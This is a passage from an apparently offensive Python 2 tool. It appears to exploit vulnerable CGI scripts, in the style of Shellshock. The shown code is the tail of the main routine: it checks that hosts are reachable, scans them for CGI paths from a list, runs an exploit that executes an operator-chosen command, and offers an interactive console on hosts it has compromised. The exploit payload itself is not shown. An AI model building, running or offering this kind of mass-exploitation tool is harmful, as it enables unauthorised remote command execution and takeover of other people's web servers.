485 | proxy = args.proxy
486 | else:
487 | proxy = ""
488 | verbose = args.verbose
489 | command = args.command
490 | if args.ssl == True or port == "443":
491 | protocol = "https"
492 | else:
493 | protocol = "http"
494 | global thread_pool
495 | if args.threads > 100:
496 | print "Maximum number of threads is 100"
497 | exit(0)
498 | else:
499 | thread_pool = threading.BoundedSemaphore(args.threads)
500 | if args.cgi is not None:
501 | cgi_list = [args.cgi]
502 | print "[+] Single target '%s' being used" % cgi_list[0]
503 | else:
504 | cgi_list = import_cgi_list_from_file(args.cgilist)
505 |
506 | # Check hosts resolve and are reachable on the chosen port
507 | confirmed_hosts = check_hosts(host_target_list, port, verbose)
508 |
509 | # Go through the cgi_list looking for any present on the target host
510 | target_list = scan_hosts(protocol, confirmed_hosts, port, cgi_list, proxy, verbose)
511 |
512 | # If any cgi scripts were found on the target host try to exploit them
513 | if len(target_list):
514 | successful_targets = do_exploit_cgi(proxy, target_list, command, verbose)
515 | if len(successful_targets):
516 | ask_for_console(proxy, successful_targets, verbose)
517 | else:
518 | print "[-] All exploit attempts failed"
519 | else:
520 | print "[+] No targets found to exploit"
521 |
522 | __version__ = '1.1'
523 | if __name__ == '__main__':
524 | main()
525 |
--------------------------------------------------------------------------------